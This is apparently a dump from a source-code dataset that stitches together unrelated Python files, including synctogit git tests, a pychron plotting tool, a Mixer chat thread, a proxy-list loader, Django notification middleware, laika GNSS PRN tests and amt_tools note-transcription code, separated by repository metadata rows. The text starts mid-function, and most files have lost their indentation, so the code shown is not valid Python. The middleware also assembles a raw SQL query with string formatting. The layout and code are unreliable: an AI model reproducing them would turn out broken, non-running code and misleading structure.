git_root = call_git("git rev-parse --show-toplevel", cwd=d)
assert git_root == d
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == (
"HEAD -> spooky Update .gitignore (automated commit by synctogit)"
)
git_branch = call_git("git symbolic-ref --short HEAD", cwd=d)
assert git_branch == branch
git_branches = call_git(
"git for-each-ref --format='%(refname:short)' refs/heads/", cwd=d
)
assert git_branches == branch
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
def test_git_new_existing_dirty_dir(temp_dir):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
with pytest.raises(GitError): # Dirty dir
git_factory(d)
def test_git_load_existing_empty(call_git, temp_dir):
d = str(Path(temp_dir) / "myrepo")
os.mkdir(d)
call_git("git init", cwd=d)
with pytest.raises(GitError): # No initial commit
git_factory(d)
@pytest.mark.parametrize(
"remote_name, remote, shadow_remote",
[
("origin", None, None),
("angel", "git@github.com:KostyaEsmukov/SyncToGit.git", None),
("angel", "git@github.com:new/remote.git", "git@github.com:old/remote.git"),
("angel", "git@github.com:same/remote.git", "git@github.com:same/remote.git"),
],
)
def test_git_load_existing_not_empty(
call_git, temp_dir, remote_name, remote, shadow_remote
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
with open(str(p / "file"), "wt") as f:
f.write("")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
if shadow_remote:
call_git(f"git remote add {remote_name} {shadow_remote}", cwd=d)
with ExitStack() as stack:
if shadow_remote and remote != shadow_remote:
stack.enter_context(pytest.raises(GitError))
git = git_factory(d, remote_name=remote_name, remote=remote)
if shadow_remote and remote != shadow_remote:
return
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
git_remotes = call_git("git remote -v", cwd=d)
if remote:
assert git_remotes == remotes_dump(remote_name, remote)
else:
assert git_remotes == ""
with pytest.raises(GitError):
git_factory(d, branch="some-other-branch")
def test_git_nested(call_git, temp_dir):
root = Path(temp_dir) / "myroot"
inner = root / "myinner"
os.mkdir(str(root))
call_git("git init", cwd=str(root))
os.mkdir(str(inner))
git_factory(str(inner))
git_root = call_git("git rev-parse --show-toplevel", cwd=str(root))
assert git_root == str(root)
git_root = call_git("git rev-parse --show-toplevel", cwd=str(inner))
assert git_root == str(inner)
@pytest.mark.parametrize("is_up_to_date", [False, True])
def test_gitignore_existing(call_git, temp_dir, is_up_to_date):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if is_up_to_date:
gitignore_file.write_text(".synctogit*")
else:
gitignore_file.write_text("*.something")
call_git("git init", cwd=d)
call_git("git add .", cwd=d)
call_git('git commit -m "The Cake is a lie"', cwd=d)
git = git_factory(d)
if is_up_to_date:
assert git.head.commit.summary == "The Cake is a lie"
else:
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
assert gitignore_file.read_text() == (
# fmt: off
"*.something\n"
".synctogit*\n"
# fmt: on
)
@pytest.mark.parametrize("dirty", ["repo", "gitignore"])
@pytest.mark.parametrize("is_dirty_staged", [False, True])
@pytest.mark.parametrize("is_new_file", [False, True])
def test_gitignore_update_with_dirty_repo(
call_git, temp_dir, dirty, is_dirty_staged, is_new_file
):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if dirty == "gitignore":
dirty_file = gitignore_file
elif dirty == "repo":
dirty_file = p / ".lalalala"
call_git("git init", cwd=d)
if not is_new_file:
dirty_file.write_text("*.pdf")
call_git("git add .", cwd=d)
call_git('git commit --allow-empty -m "The Cake is a lie"', cwd=d)
dirty_file.write_text("*.something")
if is_dirty_staged:
call_git("git add .", cwd=d)
with ExitStack() as stack:
if dirty == "gitignore":
stack.enter_context(pytest.raises(GitError))
git = git_factory(d)
    assert dirty_file.read_text() == "*.something"
if dirty == "gitignore":
# No commits should be created
git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
assert git_commits == ("HEAD -> master The Cake is a lie")
elif dirty == "repo":
# Dirty changes should be there and still not be committed.
        assert gitignore_file.read_text() == ".synctogit*\n"
assert git.head.commit.summary == (
"Update .gitignore (automated commit by synctogit)"
)
assert git.head.commit.parents[0].summary == "The Cake is a lie"
# Only .gitignore should be committed
git_show = call_git('git show --pretty="" --name-only', cwd=d)
assert git_show == ".gitignore"
# Ensure that the dirty files are in the same staged/unstaged state
git_status = call_git("git status --porcelain", cwd=d, space_trim=False)
if is_new_file:
prefix = "A " if is_dirty_staged else "?? "
else:
prefix = "M " if is_dirty_staged else " M "
assert git_status.startswith(prefix)
| 29.965957
| 86
| 0.626527
| 0
| 0
| 0
| 0
| 5,642
| 0.801193
| 0
| 0
| 2,042
| 0.289974
|
a25ad39526f4933af2df581028f2688cffce6933
| 2,117
|
py
|
Python
|
pychron/fractional_loss_calculator.py
|
ASUPychron/pychron
|
dfe551bdeb4ff8b8ba5cdea0edab336025e8cc76
|
[
"Apache-2.0"
] | 31
|
2016-03-07T02:38:17.000Z
|
2022-02-14T18:23:43.000Z
|
pychron/fractional_loss_calculator.py
|
ASUPychron/pychron
|
dfe551bdeb4ff8b8ba5cdea0edab336025e8cc76
|
[
"Apache-2.0"
] | 1,626
|
2015-01-07T04:52:35.000Z
|
2022-03-25T19:15:59.000Z
|
pychron/fractional_loss_calculator.py
|
UIllinoisHALPychron/pychron
|
f21b79f4592a9fb9dc9a4cb2e4e943a3885ededc
|
[
"Apache-2.0"
] | 26
|
2015-05-23T00:10:06.000Z
|
2022-03-07T16:51:57.000Z
|
# ===============================================================================
# Copyright 2019 ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from numpy import linspace
from traits.api import HasTraits, Int, Float, Instance, on_trait_change
from traitsui.api import View, VGroup, UItem, Item, HGroup
from pychron.graph.graph import Graph
from pychron.processing.argon_calculations import calculate_fractional_loss
class FractionalLossCalculator(HasTraits):
graph = Instance(Graph)
temp = Float(475)
min_age = Int(1)
max_age = Int(1000)
radius = Float(0.1)
def __init__(self, *args, **kw):
super(FractionalLossCalculator, self).__init__(*args, **kw)
self.graph = g = Graph()
g.new_plot()
xs, ys = self._calculate_data()
g.new_series(xs, ys)
def _calculate_data(self):
xs = linspace(self.min_age, self.max_age)
fs = [calculate_fractional_loss(ti, self.temp, self.radius) for ti in xs]
return xs, fs
@on_trait_change("temp, radius, max_age, min_age")
def _replot(self):
xs, ys = self._calculate_data()
self.graph.set_data(xs)
self.graph.set_data(ys, axis=1)
def traits_view(self):
a = HGroup(Item("temp"), Item("radius"), Item("min_age"), Item("max_age"))
v = View(VGroup(a, UItem("graph", style="custom")))
return v
if __name__ == "__main__":
f = FractionalLossCalculator()
f.configure_traits()
# ============= EOF =============================================
| 34.145161
| 82
| 0.616911
| 958
| 0.452527
| 0
| 0
| 186
| 0.08786
| 0
| 0
| 867
| 0.409542
|
a25bd49134a1f86571250e2c3fa2596b40823392
| 1,043
|
py
|
Python
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 3
|
2019-11-17T19:31:08.000Z
|
2020-12-07T00:47:22.000Z
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 16
|
2019-11-17T19:48:02.000Z
|
2019-11-24T02:49:44.000Z
|
chatrooms/mixer/thread.py
|
Dogeek/ChatAggregator
|
c1cf700e2529d6bb78ce7e4850c532ef55841d85
|
[
"MIT"
] | 3
|
2019-11-17T19:31:13.000Z
|
2019-11-21T11:59:18.000Z
|
import asyncio
import threading
from .connection import MixerConnection
from .utils import get_channel_id
from chatrooms import lock
class MixerThread(threading.Thread):
def __init__(self, **kwargs):
super().__init__()
self.channel_id = get_channel_id(kwargs.pop("channel_name"))
self.mixer_connection = MixerConnection(self.channel_id,
kwargs.pop("oauth_token", None))
@property
def last_message(self):
"""
Pops the first text message from the queue.
        :return: str, first message of the queue, or None if the queue is empty.
"""
try:
return self.mixer_connection.messages.popleft()
except IndexError:
return None
def run(self):
asyncio.set_event_loop(asyncio.new_event_loop())
with lock:
asyncio.get_event_loop().run_until_complete(self.mixer_connection.run())
def quit(self):
self.mixer_connection.running = False
asyncio.get_event_loop().close()
| 30.676471
| 84
| 0.628955
| 908
| 0.870566
| 0
| 0
| 288
| 0.276127
| 0
| 0
| 145
| 0.139022
|
a25bec9b2e01804b38b6f619f80dd7f9ad6e8b87
| 44
|
py
|
Python
|
test/py.py
|
PhilipDeegan/mkn
|
399dd01990e130c4deeb0c2800204836d3875ae9
|
[
"BSD-3-Clause"
] | 61
|
2015-02-05T07:43:13.000Z
|
2020-05-19T13:26:50.000Z
|
test/py.py
|
mkn/mkn
|
a05b542497270def02200df6620804b89429259b
|
[
"BSD-3-Clause"
] | 29
|
2016-11-21T03:37:42.000Z
|
2020-10-18T12:04:53.000Z
|
test/py.py
|
mkn/mkn
|
a05b542497270def02200df6620804b89429259b
|
[
"BSD-3-Clause"
] | 12
|
2016-01-05T05:35:29.000Z
|
2020-03-15T11:03:37.000Z
|
#! /usr/bin/python3
print("HELLO PYTHON")
| 8.8
| 21
| 0.659091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 33
| 0.75
|
a25c1f80b839438c40bc8b1ec20e3dcbcc9d3fa1
| 181
|
py
|
Python
|
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | 1
|
2021-11-23T05:28:16.000Z
|
2021-11-23T05:28:16.000Z
|
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | null | null | null |
proxy_config.py
|
Nou4r/YandexMail-Account-Creator
|
b65f24630d23c59dfb8d196f3efe5a222aa3e11a
|
[
"MIT"
] | null | null | null |
try:
with open('proxies.txt', 'r') as file:
proxy = [ line.rstrip() for line in file.readlines()]
except FileNotFoundError:
    raise Exception('proxies.txt not found.')
| 36.2
| 61
| 0.662983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.220994
|
a25c2ec82a6c0af9fd73752dd6ceae9477f697d3
| 1,577
|
py
|
Python
|
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | null | null | null |
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | 7
|
2020-03-24T17:08:34.000Z
|
2022-02-10T09:50:00.000Z
|
src/notifications/middleware.py
|
MAE776569/project-manager
|
986a1a8b84950da81e98125d70ae3ef380e96e54
|
[
"Apache-2.0"
] | null | null | null |
from .models import NotificationManager
from django.utils.deprecation import MiddlewareMixin
class NotificationMiddleware(MiddlewareMixin):
def process_request(self, request):
if request.user.is_authenticated:
notif_id = request.GET.get('notif_id', None)
ref = request.GET.get('ref', None)
if notif_id and ref == 'notif':
NotificationManager.objects.get_or_create(notification_id=notif_id,
user=request.user)
query = '''select case when notification_manager.notification_id
is null then false else true end seen,
notification.* from notification_manager
right outer join notification
on notification_manager.notification_id=notification.id
and notification_manager.user_id={0}
where notification.admin_only={1}
and notification.users_only={2}
and notification.created_at >= '{3}'
order by notification.created_at desc
limit 5;'''
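            # the interpolated values (user id, admin/users flags, join date) come
            # from the authenticated user object rather than from request input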
if request.user.is_admin:
query = query.format(request.user.id, True, False,
request.user.date_joined)
else:
query = query.format(request.user.id, False, True,
request.user.date_joined)
request.notifications = list(NotificationManager.objects.raw(query))
count = 0
for notif in request.notifications:
count += int(not notif.seen)
request.notifications_count = count
| 41.5
| 83
| 0.616994
| 1,482
| 0.939759
| 0
| 0
| 0
| 0
| 0
| 0
| 554
| 0.3513
|
a25c6100f9d37d3d232cbc72e44c946c286a4444
| 5,167
|
py
|
Python
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 365
|
2018-12-17T07:43:34.000Z
|
2022-03-29T22:23:39.000Z
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 36
|
2019-07-24T10:20:45.000Z
|
2022-02-14T22:11:24.000Z
|
tests/test_prns.py
|
mfkiwl/laika-gnss
|
dc38f251dbc7ebb535a3c220de8424634d297248
|
[
"MIT"
] | 156
|
2018-12-17T05:06:23.000Z
|
2022-03-31T12:06:07.000Z
|
import unittest
from laika.helpers import get_constellation, get_prn_from_nmea_id, \
get_nmea_id_from_prn, NMEA_ID_RANGES
SBAS_DATA = [
['S01', 33],
['S02', 34],
['S10', 42],
['S22', 54],
['S23', 55],
['S32', 64],
['S33', 120],
['S64', 151],
['S65', 152],
['S71', 158]
]
MAIN_CONSTELLATIONS = [
['G01', 1],
['G10', 10],
['G32', 32],
['R01', 65],
['R10', 74],
['R23', 87],
['R24', 88],
['R25', 89],
['R32', 96],
['E01', 301],
['E02', 302],
['E36', 336],
['C01', 201],
['C02', 202],
['C29', 229],
['J01', 193],
['J04', 196]
]
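# nmea_id blocks exercised by these fixtures: GPS 1-32, SBAS 33-64 and 120-158,
# GLONASS 65-96, QZSS from 193, BEIDOU from 201, GALILEO from 301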
class TestConstellationPRN(unittest.TestCase):
def test_constellation_from_valid_prn(self):
data = [
['G01', 'GPS'],
['G10', 'GPS'],
['G32', 'GPS'],
['R01', 'GLONASS'],
['R10', 'GLONASS'],
['R23', 'GLONASS'],
['R24', 'GLONASS'],
['R25', 'GLONASS'],
['R32', 'GLONASS'],
['E01', 'GALILEO'],
['E02', 'GALILEO'],
['E36', 'GALILEO'],
['C01', 'BEIDOU'],
['C02', 'BEIDOU'],
['C29', 'BEIDOU'],
['J01', 'QZNSS'],
['J04', 'QZNSS'],
['S01', 'SBAS'],
['I01', 'IRNSS']
]
for prn, expected_constellation in data:
constellation = get_constellation(prn)
self.assertEqual(constellation, expected_constellation)
def test_constellation_from_prn_with_invalid_identifier(self):
prn = '?01'
self.assertWarns(UserWarning, get_constellation, prn)
self.assertIsNone(get_constellation(prn))
def test_constellation_from_prn_outside_range(self):
prn = 'G99'
constellation = get_constellation(prn)
self.assertEqual(constellation, 'GPS')
def test_prn_from_nmea_id_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_nmea_id_for_SBAS(self):
        '''Numbering SBAS as a single constellation probably doesn't make
        sense, but programmatically it works the same as for the other
        constellations.'''
data = SBAS_DATA
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_invalid_nmea_id(self):
data = [
(-1, "?-1"),
(0, "?0"),
(100, "?100"),
(160, "?160"),
(190, "?190"),
(300, "?300")
]
for nmea_id, expected_prn in data:
self.assertWarns(UserWarning, get_prn_from_nmea_id, nmea_id)
self.assertEqual(get_prn_from_nmea_id(nmea_id), expected_prn)
self.assertRaises(TypeError, get_prn_from_nmea_id, None)
self.assertRaises(TypeError, get_prn_from_nmea_id, '1')
def test_nmea_id_from_prn_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_prn_for_SBAS(self):
        '''Numbering SBAS as a single constellation probably doesn't make
        sense, but programmatically it works the same as for the other
        constellations.'''
data = SBAS_DATA
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_invalid_prn(self):
# Special unknown constellation - valid number
self.assertEqual(1, get_nmea_id_from_prn('?01'))
self.assertEqual(-1, get_nmea_id_from_prn('?-1'))
# Special unknown constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, '???')
        # Constellation with unknown identifier
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'X01')
# Valid constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, 'G00')
self.assertRaises(ValueError, get_nmea_id_from_prn, 'GAA')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'G33')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'C99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'R99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'J99')
# None
self.assertRaises(TypeError, get_nmea_id_from_prn, None)
def test_nmea_ranges_are_valid(self):
last_end = 0
for entry in NMEA_ID_RANGES:
self.assertIn('range', entry)
self.assertIn('constellation', entry)
range_ = entry['range']
self.assertEqual(len(range_), 2)
start, end = range_
self.assertLessEqual(start, end)
self.assertLess(last_end, start)
last_end = end
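# Hypothetical addition (not in the original file): a standard unittest entry
# point so the suite can also be run directly with `python tests/test_prns.py`.
if __name__ == '__main__':
    unittest.main()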
| 31.895062
| 75
| 0.587962
| 4,500
| 0.870912
| 0
| 0
| 0
| 0
| 0
| 0
| 1,001
| 0.193729
|
a25d0281cfcfe0d0eb9dbdd381ee04036b26239e
| 29,969
|
py
|
Python
|
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | 4
|
2021-06-15T19:45:26.000Z
|
2022-03-31T20:42:26.000Z
|
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | null | null | null |
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | 1
|
2021-11-08T02:13:02.000Z
|
2021-11-08T02:13:02.000Z
|
# Author: Frank Cwitkowitz <fcwitkow@ur.rochester.edu>
# My imports
from . import tools
# Regular imports
from abc import abstractmethod
from copy import deepcopy
import numpy as np
import os
def filter_notes_by_duration(pitches, intervals, threshold=0.):
"""
Remove notes from a collection which have a duration less than a threshold
Parameters
----------
pitches : ndarray (N)
Array of pitches corresponding to notes
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
threshold : float
Minimum duration (seconds) to keep a note - if set to zero, notes must have non-zero duration
Returns
----------
pitches : ndarray (N)
Array of pitches corresponding to notes
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
"""
# Convert to batched notes for easy indexing
batched_notes = tools.notes_to_batched_notes(pitches, intervals)
# Calculate the duration of each note
durations = batched_notes[:, 1] - batched_notes[:, 0]
if threshold:
# Remove notes with duration below the threshold
batched_notes = batched_notes[durations >= threshold]
else:
# Remove zero-duration notes
batched_notes = batched_notes[durations > threshold]
# Convert back to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
return pitches, intervals
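# Illustrative sketch (not part of the original module): the duration filter
# above reduces to a boolean mask over (offset - onset). The helper below is
# hypothetical and reproduces that idea with a plain numpy array of
# [onset, offset] time pairs.
def _demo_duration_mask(toy_intervals, threshold=0.05):
    # toy_intervals : ndarray (N x 2) of onset-offset time pairs (hypothetical input)
    durations = toy_intervals[:, 1] - toy_intervals[:, 0]
    # Keep notes lasting at least `threshold` seconds, mirroring the branch above
    return durations >= threshold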
def multi_pitch_to_notes(multi_pitch, times, profile, onsets=None, offsets=None):
"""
Transcription protocol to convert a multi pitch array into loose MIDI note groups.
Parameters
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
profile : InstrumentProfile (instrument.py)
Instrument profile detailing experimental setup
onsets : ndarray (F x T) or None (Optional)
Where to start considering notes "active"
F - number of discrete pitches
T - number of frames
offsets : ndarray (F x T) or None (Optional)
Where to stop considering notes "active" - currently unused
F - number of discrete pitches
T - number of frames
Returns
----------
pitches : ndarray (N)
Array of pitches corresponding to notes in MIDI format
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
"""
if onsets is None:
# Default the onsets if they were not provided
onsets = tools.multi_pitch_to_onsets(multi_pitch)
# Make sure all onsets have corresponding pitch activations
multi_pitch = np.logical_or(onsets, multi_pitch).astype(tools.FLOAT32)
# Turn onset activations into impulses at starting frame
onsets = tools.multi_pitch_to_onsets(onsets)
# Determine the total number of frames
num_frames = multi_pitch.shape[-1]
# Estimate the duration of the track (for bounding note offsets)
times = np.append(times, times[-1] + tools.estimate_hop_length(times))
# Create empty lists for note pitches and their time intervals
pitches, intervals = list(), list()
# Determine the pitch and frame indices where notes begin
pitch_idcs, frame_idcs = onsets.nonzero()
# Loop through note beginnings
for pitch, frame in zip(pitch_idcs, frame_idcs):
# Mark onset and start offset counter
onset, offset = frame, frame + 1
# Increment the offset counter until one of the following occurs:
# 1. There are no more frames
# 2. Pitch is no longer active in the multi pitch array
# 3. A new onset occurs involving the current pitch
while True:
# There are no more frames to count
maxed_out = offset == num_frames
if maxed_out:
# Stop looping
break
# There is an activation for the pitch at the next frame
active_pitch = multi_pitch[pitch, offset]
if not active_pitch:
# Stop looping
break
# There is an onset for the pitch at the next frame
new_onset = onsets[pitch, offset]
if new_onset:
# Stop looping
break
            # Increment the offset counter
offset += 1
# Add the frequency to the list
pitches.append(pitch + profile.low)
# Add the interval to the list
intervals.append([times[onset], times[offset]])
# Convert the lists to numpy arrays
pitches, intervals = np.array(pitches), np.array(intervals)
# Sort notes by onset just for the purpose of being neat
pitches, intervals = tools.sort_notes(pitches, intervals)
return pitches, intervals
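# Illustrative sketch (not part of the original module): the loop above walks
# each onset forward frame by frame until the pitch deactivates or a new onset
# begins. The hypothetical helper below reproduces that walk for one binary
# activation row and its onset impulses.
def _demo_walk_offsets(activation_row, onset_row):
    # activation_row, onset_row : 1D binary arrays over frames (hypothetical inputs)
    notes = []
    for onset in np.flatnonzero(onset_row):
        offset = onset + 1
        # Stop at the end of the row, at a deactivation, or at a new onset
        while offset < len(activation_row) and activation_row[offset] and not onset_row[offset]:
            offset += 1
        notes.append((int(onset), int(offset)))
    return notes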
##################################################
# ESTIMATORS #
##################################################
class ComboEstimator(object):
"""
A simple wrapper to run multiple estimators in succession.
Order matters. For instance, a MultiPitchRefiner could be
chained before a PitchListWrapper to use the refined
predictions when generating pitch list estimations.
"""
def __init__(self, estimators):
"""
Initialize estimators and instantiate.
Parameters
----------
estimators : list of Estimator
Estimators to use (in-order) when processing a track
"""
self.estimators = estimators
def process_track(self, raw_output, track=None):
"""
Process the track independently using each estimator.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
track : string or None (optional)
Name of the track to use when writing estimates
"""
# Copy the raw output dictionary and use it to hold estimates
output = deepcopy(raw_output)
# Loop through all of the estimators
for estimator in self.estimators:
# Process the track with the estimator and update the estimate dictionary
output.update(estimator.process_track(output, track))
return output
def set_save_dirs(self, save_dir, sub_dirs=None):
"""
Update the save directories for all of the estimators.
Parameters
----------
save_dir : string
Directory under which to write output
sub_dirs : list of string or None (optional)
Sub-directories to use underneath 'save_dir' for each estimator
Specifying None for an individual sub-directory
will disable saving for the respective estimator
"""
# Loop through all of the estimators
for i, estimator in enumerate(self.estimators):
if sub_dirs is None:
# Do not add a sub-directory to the path
new_dir = save_dir
elif sub_dirs[i] is None:
# Disable saving for the estimator
new_dir = None
else:
# Append the specified sub-directory if it exists
new_dir = os.path.join(save_dir, sub_dirs[i])
# Update the save directory
estimator.set_save_dir(new_dir)
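# Hypothetical usage sketch (not part of the original module): chaining
# estimators as the ComboEstimator docstring describes. `profile`, `raw_output`
# and the directory/track names below are assumed to exist for illustration;
# the estimator classes are defined later in this module.
#
#   combo = ComboEstimator([MultiPitchRefiner(profile),
#                           PitchListWrapper(profile, save_dir='estimates')])
#   output = combo.process_track(raw_output, track='example_track')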
class Estimator(object):
"""
Implements a generic music information retrieval estimator.
"""
def __init__(self, profile, save_dir):
"""
Initialize parameters common to all estimators and instantiate.
Parameters
----------
profile : InstrumentProfile (instrument.py)
Instrument profile detailing experimental setup
save_dir : string or None (optional)
Directory where estimates for each track will be written
"""
self.profile = profile
self.save_dir = None
self.set_save_dir(save_dir)
def set_save_dir(self, save_dir):
"""
Simple helper function to set and create a new save directory.
Parameters
----------
save_dir : string or None (optional)
Directory where estimates for each track will be written
"""
self.save_dir = save_dir
if self.save_dir is not None:
# Create the specified directory if it does not already exist
os.makedirs(self.save_dir, exist_ok=True)
@staticmethod
@abstractmethod
def get_key():
"""
Default key describing estimates.
"""
return NotImplementedError
@abstractmethod
def pre_proc(self, raw_output):
"""
This method can be overridden in order to insert extra steps.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
raw_output : dict
Copy of parameterized raw output
"""
# Create a local copy of the output so it is only modified within scope
raw_output = deepcopy(raw_output)
return raw_output
@abstractmethod
def estimate(self, raw_output):
"""
Obtain the estimate from the raw output.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
"""
return NotImplementedError
@abstractmethod
def write(self, estimate, track):
"""
Specify the protocol for writing the estimates.
Parameters
----------
estimate : object
Estimate for a track
track : string
Name of the track being processed
"""
return NotImplementedError
def process_track(self, raw_output, track=None):
"""
Combines pre_proc(), estimate(), and write(), and returns output in a dictionary.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
track : string or None (optional)
Name of the track being processed
Returns
----------
output : dict
Estimate packed in a dictionary
"""
# Perform any pre-processing steps
raw_output = self.pre_proc(raw_output)
# Obtain estimates for the track
estimate = self.estimate(raw_output)
if self.save_dir is not None:
# Write the results to a text file
self.write(estimate, track)
# Return the output in a dictionary
output = {self.get_key() : estimate}
return output
class StackedNoteTranscriber(Estimator):
"""
Estimate stacked notes from stacked multi pitch activation maps.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class for others...
inhibition_window : float or None (optional)
Amount of time after which another note of the same pitch cannot begin
minimum_duration : float or None (optional)
Minimum necessary duration to keep a note
"""
super().__init__(profile, save_dir)
self.inhibition_window = inhibition_window
self.minimum_duration = minimum_duration
@staticmethod
@abstractmethod
def get_key():
"""
Default key for note estimates.
"""
return tools.KEY_NOTES
def estimate(self, raw_output):
"""
Estimate notes for each slice of a stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_notes : dict
Dictionary containing (slice -> (pitches, intervals)) pairs
"""
# Obtain the multi pitch activation maps to transcribe
stacked_multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Determine the number of slices in the stacked multi pitch array
stack_size = stacked_multi_pitch.shape[-3]
# Obtain the frame times associated with the activation maps
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Obtain the onsets and offsets from the raw output if they exist
stacked_onsets = tools.unpack_dict(raw_output, tools.KEY_ONSETS)
stacked_offsets = tools.unpack_dict(raw_output, tools.KEY_OFFSETS)
# If no onsets were provided, prepare a list of None's
if stacked_onsets is None:
stacked_onsets = [None] * stack_size
# If no offsets were provided, prepare a list of None's
if stacked_offsets is None:
stacked_offsets = [None] * stack_size
# Initialize a dictionary to hold the notes
stacked_notes = dict()
# Loop through the slices of the stack
for slc in range(stack_size):
# Obtain all of the transcription information for this slice
multi_pitch, onsets, offsets = stacked_multi_pitch[slc], stacked_onsets[slc], stacked_offsets[slc]
if self.inhibition_window is not None:
if onsets is None:
# Default the onsets if they were not provided
onsets = tools.multi_pitch_to_onsets(multi_pitch)
# Remove trailing onsets within inhibition window of a previous onset
onsets = tools.inhibit_activations(onsets, times, self.inhibition_window)
# Transcribe this slice of activations
pitches, intervals = multi_pitch_to_notes(multi_pitch, times, self.profile, onsets, offsets)
if self.minimum_duration is not None:
# Filter the notes by duration
pitches, intervals = filter_notes_by_duration(pitches, intervals, self.minimum_duration)
# Add the pitch-interval pairs to the stacked notes dictionary under the slice key
stacked_notes.update(tools.notes_to_stacked_notes(pitches, intervals, slc))
return stacked_notes
def write(self, stacked_notes, track):
"""
Write slice-wise note estimates to respective files.
Parameters
----------
stacked_notes : dict
Dictionary containing (slice -> (pitches, intervals)) pairs
track : string
Name of the track being processed
"""
# Obtain a list of the stacked note keys
keys = list(stacked_notes.keys())
# Determine how to name the results
tag = tools.get_tag(track)
# Loop through the slices of the stack
for key in keys:
# Add another tag for the degree of freedom if more than one
slice_tag = f'{tag}_{key}' if len(stacked_notes) > 1 else f'{tag}'
# Construct a path for saving the estimates
path = os.path.join(self.save_dir, f'{slice_tag}.{tools.TXT_EXT}')
# Extract the loose note groups from the stack
pitches, intervals = stacked_notes[key]
# Write the notes to the path
tools.write_notes(pitches, intervals, path)
class NoteTranscriber(StackedNoteTranscriber):
"""
Estimate notes from a multi pitch activation map.
"""
